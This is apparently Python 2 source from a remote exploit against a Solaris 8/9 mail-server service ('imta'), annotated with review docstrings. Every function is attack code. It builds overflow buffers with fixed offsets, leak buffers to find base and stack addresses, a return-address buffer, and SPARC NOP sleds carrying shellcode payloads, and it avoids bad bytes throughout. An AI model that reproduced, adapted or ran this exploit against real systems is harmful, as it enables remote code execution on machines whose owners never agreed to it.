def validReply(self, target, reply, stackBase):
    """Return True if ``reply`` equals the expected echo built from ``target.got``.

    The expected string is assembled from ``target.got``: the first entry is
    stringified as-is, every later entry is first offset by ``target.imtaBase``.
    Only the first 13 bytes of that string, followed by CRLF, are compared
    against ``reply``. ``stackBase`` is accepted but never read in this method.
    """
    got = utils.stringifyAddr(target.got[0])
    for i in target.got[1:]:
        got += utils.stringifyAddr(target.imtaBase + i)
    # 13 is a fixed prefix length tied to the peer's reply format —
    # NOTE(review): not derivable from this file, confirm against the protocol.
    validResponse = got[0:13] + "\r\n"
    if (validResponse == reply):
        return True
    return False
def buildBounceBuffer(self):
    """Return the base buffer extended with the l7, fp and pc address fields.

    Builds on ``buildBaseBuffer(self.imtaBase)`` (which also advances
    ``self.conn``) and appends, in order: the l7 value (``imtaBase + l7Imta
    + l7Offset``), 0x18 bytes of filler, ``imtaBase + fp``, and ``self.pc - 8``.
    ``self.pc`` must already be set by the caller; it is not computed here.
    """
    imtaBase = self.imtaBase
    baseBuf = self.buildBaseBuffer(imtaBase)
    l7 = (imtaBase + self.l7Imta) + self.l7Offset
    fp = imtaBase + self.fp
    # Filler is generated so it avoids self.badBytes; 0x18 is a fixed gap
    # between the fp slot and the l7 slot in the target layout (hard-coded).
    filler = utils.buildBuffer(0x18, self.badBytes)
    bounceBuf = baseBuf \
        + utils.stringifyAddr(l7) \
        + filler \
        + utils.stringifyAddr(fp) \
        + utils.stringifyAddr(self.pc - 8)  # -8 offset mirrors the check in buildShellcodeBuffer
    return bounceBuf
def buildImtaLeakBuffers(self, imtaBase):
    """Return ``(leakBuf, matchBuf)`` for a given candidate ``imtaBase``.

    ``leakBuf`` is the base buffer plus the l7 value and 4 bytes of filler.
    ``matchBuf`` is the reply pattern this code expects back: the address
    ``imtaBase + l7ImtaResponse``, a stringified zero, and the literal
    ``"01234\\r\\n"``. Calling ``buildBaseBuffer`` advances ``self.conn``
    as a side effect and may raise IndexError when no usable address is left.
    """
    baseBuf = self.buildBaseBuffer(imtaBase)
    l7 = (imtaBase + self.l7Imta) + self.l7Offset
    filler = utils.buildBuffer(4, self.badBytes)
    leakBuf = baseBuf \
        + utils.stringifyAddr(l7) \
        + filler
        # filler is necessary in case we
        # get 0x20 as the last byte in l7
    response = imtaBase + self.l7ImtaResponse
    # Expected echo; the trailing literal is compared verbatim by the caller
    # (presumably — the comparison itself is outside this method).
    matchBuf = utils.stringifyAddr(response) \
        + utils.stringifyAddr(0) \
        + "01234\r\n"
    return leakBuf, matchBuf
def buildBaseBuffer(self, imtaBase):
    """Return a fixed-layout buffer with one chosen address at several slots.

    Scans ``self.addrs`` starting at ``self.conn`` for the first entry whose
    ``imtaBase``-relative address contains none of ``self.badBytes``, and
    advances ``self.conn`` past it (side effect: each call consumes entries,
    so repeated calls walk through the list). Raises IndexError when the
    list is exhausted without a usable address.

    The returned buffer is ``self.baseBufLen`` bytes of filler with the
    chosen address spliced in at hard-coded offsets (0x104, 0x120, 0x12c,
    0x17c, ...). The slice boundaries assume ``stringifyAddr`` yields
    exactly 4 bytes so that the pieces stay contiguous — NOTE(review):
    confirm in utils; a different width would shift every later field.
    """
    filler = utils.buildBuffer(self.baseBufLen, self.badBytes)
    conn = self.conn
    found = False
    while ((not found) and (conn < len(self.addrs))):
        addr = imtaBase + self.addrs[conn]
        conn += 1
        if (not utils.intHasBadBytes(addr, self.badBytes)):
            found = True
    # Persist the cursor even on failure so the caller does not retry the
    # same rejected entries.
    self.conn = conn
    if (not found):
        raise IndexError()
    baseBuf = filler[0x0:0x104] \
        + utils.stringifyAddr(addr) \
        + filler[0x108:0x120] \
        + utils.stringifyAddr(addr) \
        + utils.stringifyAddr(addr) \
        + utils.stringifyAddr(addr) \
        + filler[0x12c:0x134] \
        + utils.stringifyAddr(addr) \
        + utils.stringifyAddr(addr) \
        + utils.stringifyAddr(addr) \
        + filler[0x140:0x17c] \
        + utils.stringifyAddr(addr) \
        + filler[0x180:]
    return baseBuf
def buildShellcodeBuffer(self, target, challenge):
    """Return filler followed by ``solaris9shellcode.build()``; set ``target.pc``.

    ``pc`` starts at ``stackBase + bigBufOffset`` and is stepped up by 4
    until ``pc - 8`` contains none of ``target.badBytes``; the filler length
    is that displacement so the payload lands at ``pc``. Side effects: this
    mutates module-level fields of ``solaris9shellcode`` (``socket_offset``,
    ``challenge``) before building, and stores the chosen ``pc`` on
    ``target``. A same-named method on line 7 of this file uses
    ``solaris8shellcode`` instead — presumably a different target class;
    confirm they are not in the same class, or one silently overrides the other.
    """
    stackBase = target.stackBase
    basePC = stackBase + target.bigBufOffset
    pc = basePC
    # Step in 4-byte units (instruction alignment) until pc - 8 is clean.
    while (utils.intHasBadBytes(pc - 8, target.badBytes)):
        pc += 4
    socketLoc = stackBase + target.socketOffset
    # Offset is relative to pc + 8 — NOTE(review): the +8 matches the
    # pc - 8 check above; why both is not explained here, confirm.
    solaris9shellcode.socket_offset = \
        utils.stringifyAddr(socketLoc - (pc + 8))
    solaris9shellcode.challenge = \
        utils.stringifyAddr(challenge);
    filler = utils.buildBuffer(pc - basePC, target.badBytes)
    shellcodeBuf = filler \
        + solaris9shellcode.build()
    target.pc = pc
    return shellcodeBuf
def buildStackLeakBuffer(self, target, stackBase):
    """Return the base buffer plus an l7 value derived from ``stackBase``.

    Unlike ``buildImtaLeakBuffers``, l7 here is ``stackBase + self.l7Stack
    + target.l7Offset`` and the base buffer is built on ``target``, so the
    call advances ``target.conn`` and may raise IndexError from
    ``target.buildBaseBuffer``. No match buffer is produced by this method.
    """
    baseBuf = target.buildBaseBuffer(target.imtaBase)
    l7 = (stackBase + self.l7Stack) + target.l7Offset
    filler = utils.buildBuffer(4, target.badBytes)
    leakBuf = baseBuf \
        + utils.stringifyAddr(l7) \
        + filler
        # filler is necessary in case we
        # get 0x20 as the last byte in l7
    return leakBuf
def buildShellcodeBuffer(self, target):
    """Return a NOP sled followed by ``solaris8shellcode.build()``; set ``target.pc``.

    The sled fills ``target.bigBufLen`` minus the payload length, in 4-byte
    units, each unit a random SPARC NOP that avoids ``badRegs`` and
    ``target.badBytes``. Side effects: mutates module-level fields of
    ``solaris8shellcode`` (``stackbase``, ``socket_offset``) and stores the
    computed ``pc`` on ``target``; ``pc`` does not influence the buffer.

    Python 2 only: ``range(0, 8) + [14, 30, 31]`` relies on ``range``
    returning a list, and ``/ 4`` relies on integer division — under
    Python 3 the first raises TypeError and the second yields a float
    that ``range`` rejects.
    """
    stackBase = target.stackBase
    basePC = stackBase + target.bigBufOffset
    pc = basePC
    # Same alignment walk as the solaris9 variant; result only recorded on target.
    while (utils.intHasBadBytes(pc - 8, target.badBytes)):
        pc += 4
    solaris8shellcode.stackbase = \
        utils.stringifyAddr(stackBase + self.l7Stack)
    solaris8shellcode.socket_offset = \
        utils.stringifyAddr(target.socketOffset)
    badRegs = range(0, 8) + [14, 30, 31] # global regs, sp, fp, and i7
    shellcode = solaris8shellcode.build()
    # Integer division (Python 2): sled length in 4-byte instructions.
    sledLen = (target.bigBufLen - len(shellcode)) / 4
    sled = ''
    for i in range(0, sledLen):
        nop = utils.randomSparcNOP(badRegs, target.badBytes)
        sled += utils.stringifyAddr(nop)
    shellcodeBuf = sled \
        + shellcode
    target.pc = pc
    return shellcodeBuf